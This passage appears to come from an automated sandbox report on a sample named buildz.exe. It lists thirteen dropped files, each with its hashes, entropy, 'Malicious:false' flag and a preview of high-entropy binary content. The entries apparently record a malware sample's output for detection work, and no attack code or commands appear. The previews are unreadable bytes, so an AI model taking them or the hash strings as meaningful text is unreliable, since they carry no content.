                        Preview:<?xml\.C....m.?........\.qAz.JO\. I.j....;kj.....|!R..xu....Qk>..XS._K..jE.'.+.x..k..^u.6.N).j.cj.Py.6.u.0.c.{|3.H.3Jr:.C.F.WGnn&.......d.E.#...GE.`..B.....C ..]...i/...........t....'8R.........*C......%.pHj....&..*....Z.v...kXG....$m.>.....m...Z.).j.......$P>.:...I..u"8i..1*.oGJ...n..,..O^%.7|...}A..... ..f..w]|.X.e...H'..%...68..}.H5...xaH...@..?....>..,q..G.k..:....U..Bt...G........iv..A...+...Gk.....,-)...m......d|......G.w........N)j...p.F.q.[...0..q.....&....7......IJ."..Z.F|..I............t3..X."~bc._6qj"{me..*...n...C...[r^.Z.....$.q.VL..r.v...A~h..M..(.n.C.......D..sE..w.kV.a..@.^\....8.s..r...j.Xf..,....4..........o.!.....eU..RV... _..4...I0.Kt......)>..Q..m<..G._....CtuV...(.....6..sV..^...H.....YN....._MV..<.;...H.o6i........._@........_.qA.W.+.7.l....KY....ill.zWC.: !.../..B.;.E.~...B).U.t... ..~.z...QS."<kg..1.UZ..`.I...Z...g..m..._..P..W....q...o.....d....01&||8W.w..@ ...w>,.....s....KEo..S.p.V.`.p.]W).A..$.{{.@.{..l].o. /.{...C..0
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1269
                        Entropy (8bit):7.843693373840052
                        Encrypted:false
                        SSDEEP:24:JyUrnz10AyNrYMj2KD1AQ7MBlhkSvtpZjBe8NMQ+f/XJTGbD:JyUrZbyVYMaU+6MB7vvtpZjY8a7/5TUD
                        MD5:32EBAF7F76B4CE5656F876E2CD305B3D
                        SHA1:FC2729826A70BC8A665910C83291075558A727BE
                        SHA-256:000EE006C60BC58DBD88C23A79578C79652E3562B867D21B374290786509F489
                        SHA-512:170954EFFBAF4B11309D0941F1CB3A5301E6C8F11D0BB8FCE1B68F4B6CEB4E5278530FD990CE70EBF05FEA2451EDEFF996E77AA6FDF57E853EC124AF488428C8
                        Malicious:false
                        Preview:<?xml..b^..Q.....9..BZ!....f6...X.d.........>kS...I.......H.^..w8?.y..'NJ.N?.A. W..".${].X4..t..@..v....:+......Z........'8.A.....R.HY....R..fn.....=.sG.~..v.....".k8.-..{.2-...M7.T'.hh8".x.f........w84..Qj....:@.Z..].....Q.S....W...6..s...7dF.u.J..|.....6:Yo.V(..E.<T[.~...Y...=.n.+vb.?}o._.g...1.........r..P.q.?X......G.l.`dT#.F...yTV.....IfM.1..qw4.(...+i..'....UR.6..jW.X\.....y".1J.....:...{.T.U-....H...s....CwN.s..:.q...?.j..Y.U.......h6.PX;}.....i#.. .p.B."Im..k..M..x.f....'h*l[..wM.5}.P..O.<..o....4!..i..n..q...=.V.q.....R............t...B.g...U.3...o\.~.....c...'...\='....,.n..j.J=<..?..v....,L..}N.H.{+....2c.c....`?)X.#.B".._.a.l".1x.ex..<.%..^(O!`.....!".g.....V.DL....F..@...{f...Rb.qX/wS+..[Yk...P..n.Fz...]..Jx.n......c....S. ...b...%.,pF...);.'...i...Z~.....>.`r2c....B$...~.m..\.YE.....j..%...x..Q...Hn.2....`.N.aU.rC......}..Z.d.1.x.xn.B..D..~V.h..19.@..CQ........._.d......WQ...H|.#{k..*6...\.p$.(^^..{..E..E.....oRi8.^?
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1994
                        Entropy (8bit):7.8919152719186245
                        Encrypted:false
                        SSDEEP:48:/j1qgGgxZ8JvMoIgvw3syV9pHmfKPkjno5Oi8EIUD:/j1RPavMo9vwcMqjno5OiiA
                        MD5:32FFC0F5CB02524CA8A6DBE6952BC0C4
                        SHA1:DD9654972B8CF235F078683E9BEE154669011620
                        SHA-256:DDF42BAFD1F27986F6F8AA494044BA834E4737735B01DD52C7E634EE5D134C56
                        SHA-512:260D827D80798907830644707BE9ABDCB5ACBA5743A74F7AB464352628E97CA2E8FEE1E706E1A0D4DECB94876578E495FD6938A736CCF8412DF966E3A4BE82FD
                        Malicious:false
                        Preview:<?xml4.._m[.....b!..uU.].K......+Q.3Q.T....R.......W...8.Q?#.!BP...N.|..3C.0WT}..^...#..3..9.1.1..Vg..........3.....bZ\..".7.)K...5.R..g1..|dNe....'..- .......8nv....J.T....8......A....g.}.".....Cc.q.....S......7....X...@.....pkG....I...){]..9|..x......6.ex. .J..&.....m..q..#.T.K.=~......8..Q.y.TV|S....}{.*..8L...3a,....>.S...e.7.Hq.8G.>..~0#...O..Pd...;...*Y...2d........'\.gT=A.......He{...55".*.IEXr..24..CfS...!....6.O..(p.v....&..2..H8....&aD.....j.aE. ..$.z.".R.F.K..%.........Wz..1S~..*CwG..w..I...8:.5.^..K...K<..0>...(.9Tg..]f.n.1.ziI.i$D*{<.KM..i......osr!..L&..t...........k#...e.B......;0..Gd.blkY....WWq....:._...wS.i.G...&...F.{i...s...k...g3q...}...<.z.....(v!.)..m!..e.......u...!j.u..6.P.V.n.....2!VO.:.pGS.c3.l...5.8Y.....]gi.q..c... $i9...#.. *.....u..AY...e=.\.MZG..V..;..F.\.p.T...././.d".B.!]I. .....a.@......^......A...R..I..8..IQ.<..J.|.X'Z....N..^0Gr.t..q.....xU..{.......XX.......=24X.Z..W..d..r..6]7...m .j6%}e..0.3/B...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1506
                        Entropy (8bit):7.863327054396096
                        Encrypted:false
                        SSDEEP:24:hTgkHy/K9aFxX8vOQDMR/3aMX5c195VMMGyC5zXKD7MkPMICoJnxQ5eGbD:VUKgxXgBD4qMXAXC5OPioJxGeUD
                        MD5:B9D83B296EEFC35C7C0C5E7DD3656D11
                        SHA1:5E90B4055EA70975AD44F1DA3FB7720DC49C7448
                        SHA-256:E9259957A162EA9F2BABB6F1636D1DB26E5F661A1C030DF1DCCC13C637C7A028
                        SHA-512:DAF7945A264417D1DD3BDFE8F3E23658DA7335418DD508D51E312503A7EEAB5E0C6DCAE1FA63415F45921A78B02B2E2A1FBF00101FC18AEB13BC01D986307ED9
                        Malicious:false
                        Preview:<?xml.k..N.|.j.........9..uw..U....~..L.u2`.Df..:...... ......B.".k.Q.......3...!.L..@.!..h..|D. .X....G.N....q.O..#.^}.D.60.]p......W,..._SG.8.....|....r...o.y9.I.:..K-...A*.H..[...3X(m..x..If..{.98zV.>.d".r.S..1.R....Hujh.4a..........E.4......VX.&`...T..:...=...6.~.5.b...Zk.2_.T.V......'.`...v.k.~.UM..*.(.JC.o.....y..J..q.r.W.(...C.s.(.`..70..q.p/.......=|.Y1.f5[...1.?q20..ij.`.B.H..F...Y)e.#[.3...`..v......C)..SL.....*V..N8.c.=........j......c.q.sY>.3i!.U..8...Yp....@|....&.|;.~....p.f...e.5).....0z..3..4r8.....I..5E-....&.Bi..Z.~p...3C.S.i..S...B..[..Yw..s.r.1.;QV.{. x..;Z.k.............:..8.HQTH-.,..Nc.5'=3..q'&zlv.}K..j.k.v.......6u=6......Q.Mm.......S........NR.ZI..s21a..&..%.U.P.....cJ(..j..&..\..+.....C0.J.....d....k.l).o.Go(H...('..5b...r5.f..o...:.g...n$.d.~....WW......m...Uh-.rK..7..%;@u..v.....q6..!o...&...fY[.z.....a..[...s.X.ZO..'_@..6;/1....Rt......)"...e.r^.Ev.....e......./..mpEy...('..(..,.8i.)...c)(..$%.a...03........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1511
                        Entropy (8bit):7.8592873486353785
                        Encrypted:false
                        SSDEEP:24:eaefAXbmdzL/eSKJUGv8MN47V4zaiFy6yx8wWng8SV9iHmlIkGbD:NEAXbuL0r747GRy6yxHWjsiSUD
                        MD5:A4AF86BF129834E27D8560EC3E52E0A9
                        SHA1:B5F9F0951CD97921DE99C951318303BA6B8FB696
                        SHA-256:44D5F4CA81253C517FEBFC077747BCED836664339E5F4A8007703E83F5C15E5C
                        SHA-512:9CC1CD89776CECA3EFCFAF9DE12DEE25A0F964DAAA6BBD11E8988CBEA7C6C9070822EBB5BED831844057921C2041BB5102BC3165AD96AA1BB06AAFF2E6E53D56
                        Malicious:false
                        Preview:<?xmlj.-l..n..4.5.........tU~...d0,..#t:.F.........}...*J6.\.7.@H.,....&n.............w<n-.NZ5XM+..^....$}iQ.CD+{..H....xb...[jn|.;..u...=.ON%...~.S.G0.6!...J.j8.%&.d^..*....8.-....6.K.........~0.*..[.8..w6.....'.}S.......A3.\i..\mU6.xA.s..c....t.$.....6-..JbGyX...j..DC..D........t..+....cl.=.U.(.. .4.mq....]#.K.i....nK..u..W..O.n*^).)...%.........a.np...X.h.A....b...xv..4.v%...@...T-.d.{../&2.L9....o..$.....Q.6.EZ.u....;.'.).8R].{:..?..u.y F....E..:....v-.N....l.......*....K.....r.h../..DF%.>.F........Y..P...4~...$.....j.E..K.#M.c..1./G....(.o...1E...J.....~..G...<........K...5.`.......g.......6.]\(`p......K.v......W..Z@..5}...c.d..q..../.........gK-H..-.$>.:.Lr/E..o....{.....@.E0q..%l.b..wc...f...n.1...I2.r|.............S.a......?......O....`...Q.3y.#.9f.=..r.{T.....^).......6.N'0zM.W..>^.gR.}c.B..X.Q...u.d.m.V.x.q.^.*..pS.........y~R...]*H!..jX..8.......\.}c.W.E......77.[...-.qy5#..0]..4'.........I...@.;....L.!..U....._CI...p
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):991
                        Entropy (8bit):7.795152552690384
                        Encrypted:false
                        SSDEEP:24:/bhkCH1TEQlbR36wKmHy3gbPAtkF1g1kURGbD:eCH14c6Jgg7YKSuUD
                        MD5:738EC1BAB29F61640C1BC982D88F6C37
                        SHA1:1401FF06735E580D22F24BF394A9093E1743F917
                        SHA-256:3947D4506F76E9DDF235C89C806E7CF9803043D7AF544C4A3762CFD7E53B48B5
                        SHA-512:557BAF451050ACC8EC6A416E9541264BE9DEDD9F7BD496F75E91ACAC347C626FC8422F7E733BAE5C7B59EE718F7187A51567F6176C2064F46815CFE79F5CCD98
                        Malicious:false
                        Preview:<?xmlPuc#.>...3.i .M...(....!.h.......@J2. ...pj.....H.;.F...S".T...(.`.WLk........h...z..0F....i..%.w&.;.J.....r..Kc)..+=..[1[8$~x.`....h.K..:.Cv..T...^J&...g...25(-.P.Y."~...N.T........%..{.d.^.........Y..g.G.....VK...r...uH.....1.r..J.ZU..;.'.q!..W......4..J. -ni........v.1.<5+.@.....|/........7L.V..n..L^VtE...J..yl0..x...*fe$..&..`..DT*."$_......HBX.:...U."..;........./..P.A....x.!.3GD\../O/.....}.kc..R.0h......=@.o.0[[.F..Gk.itJ%...M.{V..I.,A)Afn....(.H.dDyN...yAj.U..*...h8E.]`............Z..7l...,..U.W_..j..{...\z..%.dE..D.q.J..zz:..d8.du[...^c..n....1..Y&....s..&_zlZ~.0.%GYh.|_vo....,..78...K...c.HN'.....2.UjN....M.U.PLy...5$..B4q....Z@B.NDPXC.]@..rU.4..T....uc<...R........A:A/..o.x..x.c-x...m.....{.T.l.~.dJ......L....L........g.'j.~.b.z...|.7%9./.O.{m..N./B..b...J> .MC)...z....,.\..5l.....B.@.W.D.)...-1.B.Ej.>.fQ.l.j.X..27H......`.6.u.f.0..+..&..E.W...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4150
                        Entropy (8bit):7.955157318808873
                        Encrypted:false
                        SSDEEP:96:3a6PM7y5L/mPEERNRO95c2+jQxuIFbLEU6Ws0w5fUsj4A:3a6zN+smQwQ8SkUzwZUsj4A
                        MD5:BCBC758371F1438C3E046F1C2CAE43BB
                        SHA1:FFD27F7235CC625BDB78825D7E8611E6CDA387A4
                        SHA-256:70952251AB869960C8C7918EBA76003166441514600A7B0C78858AF9AB0F5E5D
                        SHA-512:51364FB41A49C51BAF5016447CF07ACD1D685EB28910302F0049A2AD15CDA96F0A44EE921D0574DBCBF92F332E0B0C6206300866D889CD03216045DB009A1F1A
                        Malicious:false
                        Preview:<?xml.5.`.Gn......~kA....ux....q.fg..o..#...#8KM..s..8)..2-.7..qC.A..&..tk..&..|..%...L.,..(g\...3..`.n..ei..2.u....)....-=.r.P.g]3".C.........T...H3".W.......8.xX.F...+'.t..M.......z...h=...c.....v~_{........I..;l.|.....Y$Z..[P@...!n...q..z.&..8.3C(7....y-.J .,........3I....E..Q=.(....Y0#...9jUd.P....h.A9"....6.W..AI5+..bX..T.%..M..s1..&Q{.q.b]D.*sb...F4.d./Y.f!.3.........@......6H*.........M......m.._..t.,5..%...K.@(Ou.F.P.......J)........=?T..@...R.....Q....j....?@$..H.+.....s......FA...r<k..z........n/...u.Ws...:J#...b....>.:......y@.}...3(..+(...5....h.2...|._ ?Kw.V..C?{...c.....1.W?..'.."......A..r/...|.a...Q.`.....A.F....I{.>9.k..I.....W5.....~9Y...%/.>..-}n.Q2."./.{.P.`K..T.....&....{.....O./.m..pgF...-.C&..w!*.......t".`...=.o..........G...v\.A......O........Y../Xn.T...R ;...%k...9T...a.....X..h.mf z.BU..L...!....Q.!.I.s.>.....$y.-.[.........Thc......6.N..f..'..;..P1..\._jKId....o..Z..t.<..V...m.rOy...7..>..f.,.u.Da(....~-.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2974
                        Entropy (8bit):7.932051131234011
                        Encrypted:false
                        SSDEEP:48:O2uXRg7obKlbNTGLOPpx1sOj6ajaKxN8j0BBkWT5Du9tlwLg6++zczYEw0VFR7bV:f+5bKRNKLOX1DeaOENm2BkW14wrzcz+e
                        MD5:B0481A9462B15AD9AEF8A9614BC8C0D9
                        SHA1:CC8F34A06282F9D3514BB533130DDD3751CCBA68
                        SHA-256:2DB71505522DE9EEAE5D2DC6C37023326D6CB4C907C29AFE3CBCAA617AC3D734
                        SHA-512:B51ED8C791BAD5E66B5EBD571AB338167DB32D07E4016CFFAFCFAFD970FED68147117D9B2975FF9E15D1F6AE43ED978B4EB6D5B655A975C3CA69E247F1C03A27
                        Malicious:false
                        Preview:<?xml......P..D.....b.D.@.f.F....v$]}....z.....P........C.....-...F.D>..R.g......r.1....!9....* sY@...../...,C.bW..')lI.x?k.T.L..H.Nx..D....3...=....XX....`.c.".....J.c|..wZl@..}o N+..Y9}..M..o..z.|.BT.....S.M...>9V|.Xz].AG....v.M...ty..+..d.......A...?.9a.^.1..Z..rg.\^..Y.15!.T..r.x.....}.....bI...W.[px.: ..D....pE...@_W.........,....t......6.....I..{....)d..`,.K.-...D..R.2.b.[..`.s(....9w.._s...7.<H..3.].f.X....7.$........ZB...5NU..G'.{..* .>^...)|...f..k...-W1.B~.{%...8..)].).[.q...l,....$h...Y.."$}R..bu..mi.........A.-R........zf*.......g.n[h....O..mdthZS1{R..B`w.j.V.f[..+,.x.:.]u!W...a}e..O.g/+.F..6dm.j6P......7.....C.......P..).......F..... ......^.V.Q.l...._i.6.w.N.Y&.j.../..UL.( K....=.+....ZF.{...)..xu....E&..E,.D...u...m:..;.7T.:.s..4..Z0...^.p{.|1G{v.l...3.....1.v.'.*.P.~.....B.w..`..G.\..WiG..i<+.Rj.-g.*d..d.....h.Q)!$.....x...>O...F0.q...g.....9.d."._.F........%.....w..a...g|KSo.@.......24X..h.....{h$I....e..C~.....Ud..C.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3363
                        Entropy (8bit):7.945739802469321
                        Encrypted:false
                        SSDEEP:48:s+rw66NK0kNcLttKTX4wZ1825zX31JjJjWkk+0Lt3H1Q1CiXYWWoXtdqqLUD:sX6V0dLXKPnzfFWkOHikPoXTqqLA
                        MD5:EF6D77F9E617D2FB0D9FDEA715D69825
                        SHA1:DB93B495CFB16A7E55CD8EFB05665FD556390A59
                        SHA-256:C2FD335692EF6AC633C7E5BC76C6F9354FC1B8D7747FE99334C60AC712C0632B
                        SHA-512:E77E16DC999DF52236CAD5C6C8AFBF6B2124B58CB9F900ADEBC8AB093B462817CBE2B75B9F41B95A2EA4BA56EEF93C2097A5E0C6C8AF39A3956D37C5F20CF369
                        Malicious:false
                        Preview:<?xml............Y...H..b..."n./.y.9)...S7..6.|........}'.x.W".2R....NV....G.^..G....6i}.....$..V.O..\.$P..W ...X*F...ql.Aj..5.v...R.(....r..f......P+."..L|...m.v.`#...t..9.....s.:)M.4+3.w2....1g.]z......9Z..3..Aq.~<.Q.3...q..B.mk....*...:.1..a.E.=F./.....X.O..R...w<..iz.$.......^.<..}.8P~.u..7J..Gj..?......I.......0[.-u.P.h...:B/.......Ev.Y+_A........6>.#...Q.5...d_'+..J9.N.C.D3..9.z3hI.uB......MZ.........T....z........A.)P.$ ........K:.iRAi1.S=..........^.S....\..Q=.!7`..G.?..w....5.x.*".....E..].#..m...$C.">./... D@D3.C*5'."..@.O.X... .z..~[!.}.&..S...dy@\:.*..4..P....1a..f.5h.UKF.C..._%2qV.?.Cs..V5.J",.......ug.:..=.....r..y....&E.....]H^...0.;...7...#.*.w...9......B?.q<.....DO..}t..k9.v....mHY.nsy....d%._..z..G71...^.`.P..9..^0...}%p8.yj... q.{I.].*h........g..;..[..j.!.h.....)..N\..e....)..[.we.0eG..?7a7..p.R.Vj......<...je..Y]{B!.......r.V4..e....."S..Mf.(...`.Z.,X."c.y11%....&..?E.{..R,.A;.:...4.`..wR.n..L.P....M[.... .i.....N%.n...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1295
                        Entropy (8bit):7.851971676010132
                        Encrypted:false
                        SSDEEP:24:BlkqrqgJlyx3LNhOOGsZFXgETvb4DY4maef2AQjw60v+xNCxfHne7aGbD:BlkqrlyxLNhQsZFXgEbb4W2AQjl8+D+A
                        MD5:5773875FCEAE8EC9ED4E5D8CE0773BCE
                        SHA1:A7F56F98172DC3FDADB9CF1A0AAA23591D1DAE94
                        SHA-256:3567E928EA1938904AAC5AAB87B0A1322384FFE1FCDD7A79A23FE1626CC93EBC
                        SHA-512:800765D4CF833F1F1601AA20EC8A4A4AA673D329E58E61185B767351AF5F4436E8C339260146DC1E4F708EAC40E0B5C41630B93CBCB701E0C4796711C9B7E958
                        Malicious:false
                        Preview:<?xml.....P..h.....I.Lbp....9Z[V...Jd.m...7q..J.R.....@.7F'O..QF..|.n.q..E../ci[z..M..E..,..J...........OB`Cp...T..hs?HF..Q...t....o.D~..ES.......~.......3Q..(._g...Wi7...i..#v.n..S..*.7..#.B/.U$..F-...z.o..FN.*..+(.,g.>....6R...B...<.....h.fRV>..{$..,.......h.+$..UQ.....A.Tv.....n......|.D.i....g,...n...b..'4.....j....ci...kK..uTX.i8_.+..K.2.....gt/8Ytd2....glZ.H`...y..T~4.^...3.7...#....m.8A.*z..?.<..l.A...G...!l...>1&w.7........KIf.......AKs."......N....lMI#~..\...TK. .JzWj....s.|...C..:.(.V......O......&.b"SU..n.&.....c.e...5....jS(0.I.u0...@.z....R..f>...~!I...w....]......SI.........y.\(...W...lEh.!Fu.A.}..c.....1....od0...|]6n.X.J...7.l4i-...B{.So;.3....^.+..+..\......\.!.$.S..!....)R...'.Rg_g.......rA..E....@.w..w ..{.w.....3z.7....)=..`....'.d.. ...rju..P..pS.=;..M.......k.cY.U.&.S.F.b\......27.(...+M..=..Q.j.Gwe2.M..&=.....0..N..?*.....G....2.D...q.._.:....cx.A" ..kd.-c..B.....a......?.i.f..Q.h.....X>e^...T..<h.C...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2582
                        Entropy (8bit):7.929515409949001
                        Encrypted:false
                        SSDEEP:48:+bfu0GjnEBfY5KSFP6C/R0nydKAKFSMOrlzK9oR1JX48oMzQZvoABK/hl/ZUD:+b20GjEu4SdxZdNoO+9UvX48cBoABYZA
                        MD5:75EA6524D69EA434802D4D8A66AC3935
                        SHA1:07A79AB8F2F0D99D84506CCACDB221CB605CCCD2
                        SHA-256:C0839015A1637745605E47E9FE1A1E132112905A5119181D7F5660E82ABD1376
                        SHA-512:3E238C5EA5008CEE8CD2CF8DEE703DE7571F7A257C263C61C0BD5B96DF71C69069C66777923EBAA407C125A50ED1321314F7D9CAD33F51937FC346D82D65096B
                        Malicious:false
                        Preview:<?xml._.b.E....:g.C.........d..,..9=..8}....$..u.:7.....H;..9......".V.M.m.....G............@.>..Yz..D...K,.6.R.,r6....;Z...w..0.Y{.'...n....1WuZ..%(..O....u;C.a.af..T.Rt:ITQ.0.;..G..mgf..0P@X...|.k.`Y..[..c T9...;..b.%I.I.......8.....*.....!}h....4[v..@....K..1..o.L...mk\a.p....\.....g.U.....\s.H...I9..+I..Qsc.X.I...}.6..'[.+g.U).(=...`......kI...........7.7..v...........h*f....55...}....2...O...T1......[.!$s...Q..j..z$U~.E.$d...{;..0..p..h.#..DZ...........d....:=.A[..Z....]...gi.....k.8j....+.)8.&.W..D|.4i..&......m."F...G..G..B..H._...)~.l^.,|..ad@..\a...X....\G....M....Ai......D.=.Vi.z.=..|..++..{2...a...\.@....3.4....o.c...@Y.`.W.|Y#[.....l...k.;.!D....46}.x.>.;..&L.,n...,..Fh.......q.......j&2....).i...[.|,.RCnQ.*.\.!...t.u.\.v.5..#....RF.9@...4....$O...H<.>........&....Q.'o/},q....\..K>..f..."z2%.`...S..$Ob....V.....G...... ._.{...?.....J..g.T^*}..T2E%.|......Pq.T...e...P..(...o*...1b..%...g/.uL......"..../...*.;.........6D.Ibi0K....}{J..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1787
                        Entropy (8bit):7.899299163632239
                        Encrypted:false
                        SSDEEP:48:Dw1dr+MJU/vM0zAb9X/oWaW/i75DaAcHUD:DwD5UhyXgWdadDaDHA
                        MD5:44E623EDAB88E1D2427231E9AFD7DC12
                        SHA1:C907B1710D40A9C260AABEE9783E265963A9930E
                        SHA-256:9EF4933E59BA6604DE78160C1FDEE6B9559A7C197124817C93A21BB61107A426
                        SHA-512:84330D64C2B2800ED188B9CF6FB9A9CE3BE3E2178CF4A3C8F43FD638E42374E90DF2D2B20DEB02F55A996976FBC2FBFE52CE4099DAA33169F2E5FC1509DC2046
                        Malicious:false
                        Preview:<?xml...<.]....FC..6..A,.c/\.5l#..f_KR....)...O....6...P...F..?..9.;._.T../w7.Mj..X.u.\...^. .J.\...W........5..?...R...).OD}..'..K.ZiH.{...E..d...Q........R.e..y3....F*..m._.D.|....a.n.*\.T.`..L(...o9.+.N.....4..9. U.$...c.*.hX.C............+v4$X.R^....7. GX...s.@t........@/....J..|F..W../.S.ak., `...f.._Am..:...?.....oTi`(0.}..........B...\.k......Y?.D....._.L.q...mO......D2.(0..B......$j.5.ZUG.._.H.....yzXz%....*G..B.h...gn........k..EM...I.@...~|!-..ts+......p..F..z..2.P........Hw.......|........l2.m...h1[|.C.3.h.b.p.u..1W....B.!......s..0.".c.hI..9......o..M<.w..T.9.+..~d....8(.%.y...+..e.O..@..U..!A..P.g.SY.<)..W.J.J..F^..."Ne.#kM.hN.f...[H.(..q..`....2TA....ps....*.W.-..'E..S..y....D..$p......5.H.c...........<.j.5..-..|....7].C......7.{.....c..q...x.g.?.F..F.ZI+.. .f..z$.V.l1..S.'A..!..[..L.....B......(@EhIi..qp..F~m.H..A....EG..K ....i.......iW.ueju..._..q.o2.O...ev.p.pc..*.^..T.X....U9D......to.........|...E.G....H.....Z6...3.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1583
                        Entropy (8bit):7.884282369389147
                        Encrypted:false
                        SSDEEP:24:dD7SVz8GI7m18qO3WqKUp11lnb3CYlAOb6u0L7esjy1S2xReyjjLiuGbD:Jgz8GI7m1KvKSVWu0L6j4U3iuUD
                        MD5:5097734683E744028F650E6B380C4852
                        SHA1:3D9F2192249836B2A8CF1159C2C8156438326A8D
                        SHA-256:588564DED1A445A1525D5E6B927CA17692FBB5976CF6F4F803907653EAFBDBBD
                        SHA-512:76EE920E23A4630584E407B59CB2FD75D591C0B9CA6C8E2B36E9EE372D1102C7B81A53154E44AB0B97862D9BB663C5D93DAE9A9C2E37B2B2D0DF3CB050AFECE8
                        Malicious:false
                        Preview:<?xml.(J}~...on.p_W....+...n.?....J.......... ...F...^.:.jh..@..g....6....?H....e.<U.......0...9...I.j];T^JR.S....IM.{~.3..[...#...g..0/.:.i..[.!.N~G[N..%Yd.Z..k....zq..Ifs.ya..n.V4.m.).H.....~.b....7..1......t.y...x..}=.lM+..m....)..:.T.o5.....Ox.;.).0.-*1.............i..v..p5hv&^....{.4.`...a.A......RqN.A!8..o...w.....V."...Tz.G.zj.?@3....J_.......[....`'..aA..U._.(i..:..?B..k..m.D.Jx.`....(..>1......X.$..C..".].A... f..=..J.O.....cx]..6~.....S...VAA.DEn.x.!eW....a..RK.k6.3.GA{..i.C....P..P.(.s..\.C.}...dJ..G.wo..f.=..)..Zs.[.*..A[!..m.O$..f...T.'....B....2} r...;F...x..H.K........dm.(Y.b.J.`...d..4.F..P.j:..i..l...=.0<.M..'.z.\.h.8$....F...FR..WX...~.=.....x+..Ml..n..p...r....i..$:Ux.8..!..KN..q.t..z....E.@...U...3r..r.$..{.3x.l~...[.Z...M.n.?..GY...U.i.b~+P.O.)..[.k.$.A;....... X........._.j-..m!.b.......u.6.9../.L....S*!.u....h....n)RjQH5.....h.|....`..tHA..eR\-C0..4.$.(..C..aB....I.._....4h....d..Y@.G/{C.....1_sNa.Zl
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2801
                        Entropy (8bit):7.926524872544491
                        Encrypted:false
                        SSDEEP:48:+JTv9HDWqdXBuyD2E57ScBMmmNmxb/W32TPGtqUeIpM9EOfqUD:+JTFHCOBurE5ScBONmxGctIpM9E7A
                        MD5:AB297EF08A1FA89762DB3069D6A71AD4
                        SHA1:3E5A118336A709CEDB8E5CA5A5E6BC879B0C8FAB
                        SHA-256:3A8C682F3E5ED3A3EDB5BA6C54621120F2566D7606FCB58FD9C6DE41854B85B7
                        SHA-512:5AFFB0412EFD99307ACD07458EC2DB7ED5C8EAC0F6103362E35CAC7FAD248A9EA4077BCD5E210837C5CF2195180BE673F59838E6A4639EA28929B0F90E6042F6
                        Malicious:false
                        Preview:<?xmlV.)......mck...(.<q..O.k.._U..[..4nF....iPT..`...FP..h.N.Y..w[.8'....z.f....=....4...`.:...#...;.l.Qgc..??LPG.l.>.V...E.n..x.iP.o..O.YJ.Ma..3M.W.v^.7..0....Kq.@...\...v.*X.{.|....Y..@..d... Rzc.<..G.l,h...R....#..D...#.6q....F.^..,.....?..TcAA...6....BT......b...k.vc/........2.2..l|..k...!....G..rmB...?.9.P........I.{d.l....[M.K...ar.|.Z...V....%-.FVY....]}j..D.+.<....W4@...f.......'....XDn..x...........tC..9...)...s.8Z.....+x#..V.W^;...@u0..|8x .....LC...l1&.&.....N...Q..|...e....W.......[s......9.?.....sl.+G...A......+.^/`y.....*...-........ ..'...?[y..Ld.2..4\..I.......Q/..(K}.Y.l.c.-.~....j...26v.{z.J...AT&^...D...'.1S..9...n..t..U.I.NX.4...g.....M.q.*F..M ...........N...V..]..O.p..>.+..R.<;...\ .Y........Cg+).4y.M...h=...{v..X".iR.../..A.c.....>...H..w+........j._.>.)L........a.\..Q9..'.4p......."f....I{..g_.....d(.E..e.._...HFN...\.b..oG('v!.......!.LT...y^.^/...<.h.S..3.*M...X..v...-.x....u.!+.."jI....c.Q.@.c$=..c2.Y..].m.3.......b
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4121
                        Entropy (8bit):7.961269060682633
                        Encrypted:false
                        SSDEEP:96:WbXVv9SPapHlWmf+sPp5Hk2TeLNXDgX72RiJvy93muoA:6XNcPQlRf+sHHk2iZ0KOvypmuoA
                        MD5:B5EA9247DAAFC18524C0BCDFE5538680
                        SHA1:08A987238AAF62683CF832E7A263428FD87B4AC4
                        SHA-256:B89B701B7264A331772FFE38A33B543FB7A14959738B797229D7CB349FB9A94D
                        SHA-512:C349EC2C5BAD50570A2B49BC21513EFA5E4C9C0BD5331379CD86586AB11D68C6B462BB310E5197FCA36D0485858213CCC3064EA734A09A38734425C3990DA5AD
                        Malicious:false
                        Preview:<?xml.....+....y+.g.v.....p.*h).'.Ta3c....!z1..9...'*......L....I...X.R........Pbl.. .Cs.....WA8....C...q.Q..J'.8`O..WB*.9....)mlIo.....yo{./.ZT..ij..n.%.....Gs*..w..g...9qK.RId....H.....d.R.P4|.....AV{.H..C..}.:.\..Acy.Hs....1.....k.s..g...~aUr.vhP.......u....1.lH*:.w..Ca....Nd."...Q..4P...d?er..J..P.=...<..z...S....M]......n..0h.^#7....o....n._..T...g}.F.C........*%...P.x.'..C..B...5.B.3{.v.gV...f....CQ.k(..).|e...]....x..V.&..?g...5..}16.$.<...v..\.` .C..._...O....K$y.A.<......2...W...Y\b".1j...(.........<.f....3..P$rf~.]..&.~.P.P..dgw.m.bc6{3.G..g.S.. .%.2$.../W.d^......e...&.0.5f.}.c|T.92......L.4G.U....K.#`.......;`L]..\.C.p.B!.......x.R\.=.U..V']k. 